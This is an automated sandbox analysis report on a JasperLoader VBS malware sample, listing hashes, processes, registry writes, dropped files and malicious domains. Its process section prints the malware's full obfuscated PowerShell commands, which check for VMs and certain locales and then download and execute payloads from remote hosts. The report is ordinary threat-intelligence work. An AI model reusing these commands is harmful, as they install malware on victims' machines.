analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Fatture__287328.vbs

Full analysis: https://app.any.run/tasks/8b29582f-e3b8-42a5-b4d3-fdc9764d51bb
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: April 23, 2019, 13:18:49
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
loader
jasper
trojan
Indicators:
MIME: text/plain
File info: ASCII text, with CRLF, LF line terminators
MD5:

6B6582414A6892B336DFEE77DBB1E49A

SHA1:

44991BC4BA092C1250B457EBBEC73768B1564CD6

SHA256:

3C9CED096CB2E30456879F60C467DDDC60F0FE4FD2BD8D64832C11B57561BDD4

SSDEEP:

24:UbHnwqQUl5YOFXx6F43oYndtZTYt3386VMhBW8Dogg6pFEcuVeB3YERAkzXGNgi1:+HnvQMYO36so0hI23s

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Writes to a start menu file

      • powershell.exe (PID: 3480)
    • JASPER was detected

      • powershell.exe (PID: 3480)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 3480)
      • powershell.exe (PID: 3872)
    • Executes PowerShell scripts

      • WScript.exe (PID: 3188)
      • WScript.exe (PID: 2808)
    • Executes scripts

      • powershell.exe (PID: 3872)
    • Executes application which crashes

      • powershell.exe (PID: 3872)
  • INFO

    • Dropped object may contain Bitcoin addresses

      • powershell.exe (PID: 3872)
      • powershell.exe (PID: 3480)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
40
Monitored processes
5
Malicious processes
2
Suspicious processes
2

Behavior graph

Click at the process to see the details
start wscript.exe no specs powershell.exe wscript.exe no specs ntvdm.exe no specs #JASPER powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
2808"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\Fatture__287328.vbs"C:\Windows\System32\WScript.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
3872"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command $a='';105,102,40,32,40,40,71,101,116,45,85,73,67,117,108,116,117,114,101,41,46,78,97,109,101,32,45,109,97,116,99,104,32,39,82,85,124,85,65,124,66,89,124,67,78,39,41,32,45,111,114,32,40,40,71,101,116,45,87,109,105,79,98,106,101,99,116,32,45,99,108,97,115,115,32,87,105,110,51,50,95,67,111,109,112,117,116,101,114,83,121,115,116,101,109,32,45,80,114,111,112,101,114,116,121,32,77,111,100,101,108,41,46,77,111,100,101,108,32,45,109,97,116,99,104,32,39,86,105,114,116,117,97,108,66,111,120,124,86,77,119,97,114,101,124,75,86,77,39,41,32,41,123,32,101,120,105,116,59,32,125,59,36,101,119,120,100,100,104,32,61,32,91,83,121,115,116,101,109,46,73,79,46,80,97,116,104,93,58,58,71,101,116,84,101,109,112,80,97,116,104,40,41,59,36,97,103,116,116,97,32,61,32,74,111,105,110,45,80,97,116,104,32,36,101,119,120,100,100,104,32,39,84,118,95,120,54,52,120,51,50,46,101,120,101,39,59,36,116,120,97,98,32,61,32,39,104,116,116,112,58,47,47,105,116,46,112,114,111,97,99,116,105,111,110,102,108,117,105,100,115,46,99,111,109,47,97,112,105,63,119,115,118,101,116,39,59,36,102,103,105,119,119,118,103,32,61,32,74,111,105,110,45,80,97,116,104,32,36,101,119,120,100,100,104,32,39,83,101,97,114,99,104,73,51,50,46,106,115,39,59,36,120,97,106,120,32,61,32,39,104,116,116,112,58,47,47,105,109,103,46,114,104,101,111,118,101,115,116,46,99,111,109,47,108,50,46,112,104,112,63,118,105,100,61,112,101,99,56,39,59,36,117,98,121,104,106,32,61,32,74,111,105,110,45,80,97,116,104,32,36,101,119,120,100,100,104,32,39,119,122,116,120,46,112,100,102,39,59,36,100,119,97,101,103,120,120,32,61,32,39,104,116,116,112,115,58,47,47,119,119,119,46,105,110,97,105,108,46,105,116,47,99,115,47,105,110,116,101,114,110,101,116,47,100,111,99,115,47,105,115,116,114,95,111,112,95,117,99,109,95,50,49,56,52,50,53,46,112,100,102,39,59,116,114,121,123,40,78,101,119,45,79,98,106,101,99,116,32,78,101,116,46,87,101,98,67,108,105,101,110,116,41,46,68,111,119,110,108,111,97,100,70,105,108,101,40,36,120,97,106,120,44,36,102,103,105,119,119,118,103,41,59,83,116,97,114,116,45,80,114,111,99,101,115,115,32,36,102,103,105,119,119,118,103,59,125,99,97,116,99,104,123,125,59,116,114,121,123,40,78,101,119,45,79,98,106,101,99,116,32,78,101,116,46,87,101,98,67,108,105,101,110,116,41,46,68,111,119,110,108,111,97,100,70,105,108,101,40,36,116,120,97,98,44,36,97,103,116,116,97,41,59,83,116,97,114,116,45,80,114,111,99,101,115,115,32,36,97,103,116,116,97,59,125,99,97,116,99,104,123,125,59,116,114,121,123,40,78,101,119,45,79,98,106,101,99,116,32,78,101,116,46,87,101,98,67,108,105,101,110,116,41,46,68,111,119,110,108,111,97,100,70,105,108,101,40,36,100,119,97,101,103,120,120,44,36,117,98,121,104,106,41,59,83,116,97,114,116,45,80,114,111,99,101,115,115,32,36,117,98,121,104,106,59,125,99,97,116,99,104,123,125,59|%{$a+=[char]$_};iex $a;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
WScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3188"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\SearchI32.js" C:\Windows\System32\WScript.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
1120"C:\Windows\system32\ntvdm.exe" -i1 C:\Windows\system32\ntvdm.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
NTVDM.EXE
Exit code:
3221225477
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3480"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" if( (Get-UICulture).Name -match 'RU|UA|BY|CN'){ exit; };$xyubafdcgtagfgdc = [System.IO.Path]::GetTempPath();$hazidtxdayudyefhf = Join-Path $xyubafdcgtagfgdc 'SearchI32.txt';$wsaihzsvwfgizjxhtdeisc='http://green.dddownhole.com/cryptbody2.php';$bxwujxbsactjaxugish = Join-Path $xyubafdcgtagfgdc 'SearchI32.js';$jhisfebtiigseafisvahcuua='http://green.dddownhole.com/loadercrypt_823EF8A810513A4071485C36DDAD4CC3.php';$cvybayyvwuzyfvsjctxegea = '';$hbeiivzdvzyisjxyuaj='(vztzxavNvztzxavew-vztzxavObject Nevztzxavtvztzxav.WebClvztzxavienvztzxavt).vztzxavDownvztzxavloadFile($wsaihvztzxavzvztzxavsvwfgizvztzxavjvztzxavxhtdeisc,vztzxav$hazivztzxavdtxvztzxavdayudyefvztzxavhf)vztzxav;' -replace 'vztzxav','';iex $hbeiivzdvzyisjxyuaj;$eufue='(New-OVuE632Ebject NeVuE632Et.WebClVuE632EiVuE632Eent).DowVuE632EnVuE632EloadFVuE632Eile($jVuE632EhisfebtVuE632EiigseafVuE632EiVuE632EsvahVuE632EcVuE632Euua,$bVuE632ExVuE632EwuVuE632EjxVuE632EbsaVuE632EctVuE632EjaVuE632Exugish);' -replace 'VuE632E','';iex $eufue;Get-Content $hazidtxdayudyefhf | Where-Object {$_ -match $regex} | ForEach-Object { $cvybayyvwuzyfvsjctxegea += $_ -replace '..(.)','$1'};iex $cvybayyvwuzyfvsjctxegea;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
WScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
977
Read events
843
Write events
134
Delete events
0

Modification events

(PID) Process:(2808) WScript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
0
(PID) Process:(2808) WScript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
1
(PID) Process:(3872) powershell.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
Operation:writeName:LanguageList
Value:
en-US
(PID) Process:(3872) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(3872) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableConsoleTracing
Value:
0
(PID) Process:(3872) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:FileTracingMask
Value:
4294901760
(PID) Process:(3872) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:ConsoleTracingMask
Value:
4294901760
(PID) Process:(3872) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:MaxFileSize
Value:
1048576
(PID) Process:(3872) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:FileDirectory
Value:
%windir%\tracing
(PID) Process:(3872) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
Operation:writeName:EnableFileTracing
Value:
0
Executable files
0
Suspicious files
4
Text files
5
Unknown types
1

Dropped files

PID
Process
Filename
Type
3872powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\15CYDCEZLX95GNTOVPFI.temp
MD5:
SHA256:
1120ntvdm.exeC:\Users\admin\AppData\Local\Temp\scs70.tmp
MD5:
SHA256:
1120ntvdm.exeC:\Users\admin\AppData\Local\Temp\scs81.tmp
MD5:
SHA256:
3480powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\APO3SY5MQLR3NC7YBW5R.temp
MD5:
SHA256:
3872powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:5F9A7BF5388376D94C2EDCA422810BEC
SHA256:8B2183F4F2F735C231B1F81D46CB86CB1FB51168824DE82F3A9EA79C12CAF82C
3480powershell.exeC:\Users\admin\AppData\Local\Temp\SearchI32.tmptext
MD5:5F7196C1418D24471EE6EAC188393BEA
SHA256:3BCD871B678CE827D42E673094F661A646FC43C41DF11145B3E049A10B5FE1A6
3480powershell.exeC:\Users\admin\AppData\Local\Temp\SearchI32.jstext
MD5:2D3B5624645337B97AC28F4F92661529
SHA256:EE2FBAC16683FD518036D3F662004A3111AFDB6572C5300DCDB5A4D5F68B75CE
3480powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:5F9A7BF5388376D94C2EDCA422810BEC
SHA256:8B2183F4F2F735C231B1F81D46CB86CB1FB51168824DE82F3A9EA79C12CAF82C
3872powershell.exeC:\Users\admin\AppData\Local\Temp\Tv_x64x32.exetext
MD5:EB94A1CDC7581CBA2801BA929D5CBE96
SHA256:9CC6CE83098A2D1C852B990CEDC63220F77A3E4CAC7E605949DA8FDE0E4A3191
3872powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF12f9ba.TMPbinary
MD5:5F9A7BF5388376D94C2EDCA422810BEC
SHA256:8B2183F4F2F735C231B1F81D46CB86CB1FB51168824DE82F3A9EA79C12CAF82C
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
5
TCP/UDP connections
5
DNS requests
4
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3872
powershell.exe
GET
200
185.158.251.243:80
http://img.rheovest.com/l2.php?vid=pec8
NL
text
11.4 Kb
malicious
3872
powershell.exe
GET
200
185.158.249.151:80
http://it.proactionfluids.com/api?wsvet
NL
text
4 b
suspicious
3480
powershell.exe
GET
200
185.158.251.243:80
http://green.dddownhole.com/cryptbody2.php
NL
text
10.4 Kb
malicious
3480
powershell.exe
GET
200
185.158.251.243:80
http://green.dddownhole.com/loadercrypt_823EF8A810513A4071485C36DDAD4CC3.php
NL
text
18.0 Kb
malicious
3480
powershell.exe
GET
200
185.158.251.243:80
http://green.dddownhole.com/?b=USER-PC_DELL_62f21c60&os=6.1.7601.17514&v=408.3&psver=2
NL
text
2 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3872
powershell.exe
93.147.161.40:443
www.inail.it
Vodafone Italia S.p.A.
IT
unknown
3872
powershell.exe
185.158.251.243:80
img.rheovest.com
23media GmbH
NL
suspicious
185.158.249.151:80
it.proactionfluids.com
easystores GmbH
NL
suspicious
3480
powershell.exe
185.158.251.243:80
img.rheovest.com
23media GmbH
NL
suspicious

DNS requests

Domain
IP
Reputation
img.rheovest.com
  • 185.158.251.243
malicious
it.proactionfluids.com
  • 185.158.249.151
suspicious
www.inail.it
  • 93.147.161.40
unknown
green.dddownhole.com
  • 185.158.251.243
malicious

Threats

PID
Process
Class
Message
3480
powershell.exe
A Network Trojan was detected
MALWARE [PTsecurity] Trojan-Downloader.Script.Generic (JasperLoader)
3480
powershell.exe
A Network Trojan was detected
MALWARE [PTsecurity] Trojan-Downloader.Script.Generic (JasperLoader)
1 ETPRO signatures available at the full report
No debug info